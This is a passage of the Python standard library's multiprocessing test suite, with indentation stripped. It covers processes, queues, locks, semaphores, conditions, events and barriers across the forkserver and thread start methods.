N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
